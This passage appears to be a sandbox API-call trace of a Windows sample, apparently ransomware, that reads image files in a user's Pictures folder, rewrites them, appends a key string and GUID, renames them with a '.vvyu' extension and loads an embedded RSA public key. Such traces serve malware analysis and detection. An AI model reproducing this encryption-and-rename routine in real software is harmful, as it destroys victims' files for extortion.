UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0199.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0199.511] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0199.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0199.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0199.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xed90) returned 0x2ea79b0 [0199.512] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0199.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0199.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0199.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0199.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0199.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0199.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f4b0 [0199.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3140 [0199.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f4f8 [0199.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3158 [0199.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3188 [0199.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea31e8 [0199.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea31a0 [0199.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0199.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0199.513] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0199.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0199.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3188 | out: hHeap=0x620000) returned 1 [0199.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31a0 | out: hHeap=0x620000) returned 1 [0199.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31e8 | out: hHeap=0x620000) returned 1 [0199.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0199.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea31e8 [0199.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0199.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea31a0 [0199.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0199.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3188 [0199.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0199.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c998c8 [0199.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0199.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0199.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0199.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99c10 [0199.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85ac8 [0199.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0199.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0199.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31a0 | out: hHeap=0x620000) returned 1 [0199.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0199.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3188 | out: hHeap=0x620000) returned 1 [0199.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0199.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0199.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31e8 | out: hHeap=0x620000) returned 1 [0199.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0199.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0199.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0199.517] GetCurrentThreadId () returned 0x66c [0199.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0199.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea66a0 [0199.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9728 [0199.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0199.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0199.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0199.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0199.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0199.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.518] GetCurrentThreadId () returned 0x66c [0199.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0199.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.519] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0199.519] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0199.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0199.519] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaf50 [0199.519] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0199.519] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0199.519] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0199.519] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea31e8 [0199.520] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0199.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0199.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0199.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0199.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0199.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0199.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0199.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0199.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3188 [0199.520] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0199.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0199.520] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0199.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0199.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0199.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0199.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0199.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea31a0 [0199.520] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0199.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0199.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0199.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3170 [0199.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0199.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3200 [0199.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0199.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0199.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0199.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea31d0 [0199.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0199.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea31b8 [0199.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0199.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3218 [0199.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31b8 | out: hHeap=0x620000) returned 1 [0199.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea31b8 [0199.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31d0 | out: hHeap=0x620000) returned 1 [0199.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0199.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0199.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0199.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0199.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0199.522] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3188 | out: hHeap=0x620000) returned 1 [0199.522] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3188 [0199.522] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0199.522] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0199.522] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31e8 | out: hHeap=0x620000) returned 1 [0199.522] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0199.522] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3218 | out: hHeap=0x620000) returned 1 [0199.522] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0199.522] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0199.522] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99af8 [0199.522] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0199.522] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0199.522] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3188 | out: hHeap=0x620000) returned 1 [0199.522] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0199.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0199.523] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0199.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0199.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0199.524] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0199.524] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0199.524] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0199.524] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0199.525] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.525] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0199.525] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0199.525] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0199.525] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31b8 | out: hHeap=0x620000) returned 1 [0199.525] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0199.525] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3200 | out: hHeap=0x620000) returned 1 [0199.525] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0199.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31a0 | out: hHeap=0x620000) returned 1 [0199.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3170 | out: hHeap=0x620000) returned 1 [0199.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0199.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9728 | out: hHeap=0x620000) returned 1 [0199.527] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0199.527] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3158 | out: hHeap=0x620000) returned 1 [0199.527] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8f4f8 | out: hHeap=0x620000) returned 1 [0199.527] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0199.527] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0199.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaf50 | out: hHeap=0x620000) returned 1 [0199.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0199.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0199.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0199.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0199.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0199.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0199.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0199.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0199.529] WriteFile (in: hFile=0x510, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0xed8d, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0xed8d, lpOverlapped=0x0) returned 1 [0199.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0199.530] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0xed92, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.531] WriteFile (in: hFile=0x510, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0199.531] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0199.531] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0199.531] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0199.531] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0199.531] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0199.532] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.532] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0199.532] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0199.532] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0199.533] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0199.533] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0199.533] CloseHandle (hObject=0x510) returned 1 [0199.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0199.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x2ea6a68 [0199.535] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0199.535] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\5qVH55h.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\5qvh55h.bmp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\5qVH55h.bmp.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\5qvh55h.bmp.vvyu")) returned 1 [0199.539] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0199.540] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0199.543] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c6eb88 | out: hHeap=0x620000) returned 1 [0199.543] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26b48400, ftCreationTime.dwHighDateTime=0x1d8a701, ftLastAccessTime.dwLowDateTime=0x123ccd0, ftLastAccessTime.dwHighDateTime=0x1d8a708, ftLastWriteTime.dwLowDateTime=0x123ccd0, ftLastWriteTime.dwHighDateTime=0x1d8a708, nFileSizeHigh=0x0, nFileSizeLow=0x10a41, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9OGpykt3_l8cM2Jx4cn.jpg", cAlternateFileName="9OGPYK~1.JPG")) returned 1 [0199.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa6) returned 0x2c6eb88 [0199.543] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.543] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\9OGpykt3_l8cM2Jx4cn.jpg") returned=".jpg" [0199.544] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\9OGpykt3_l8cM2Jx4cn.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\9ogpykt3_l8cm2jx4cn.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0199.544] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=68161) returned 1 [0199.544] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0199.548] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x10a1b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.548] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0199.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0199.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0199.551] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.551] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x10a41, lpOverlapped=0x0) returned 1 [0199.552] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.552] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0199.552] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.552] lstrlenA (lpString="-----BEGIN PUBLIC 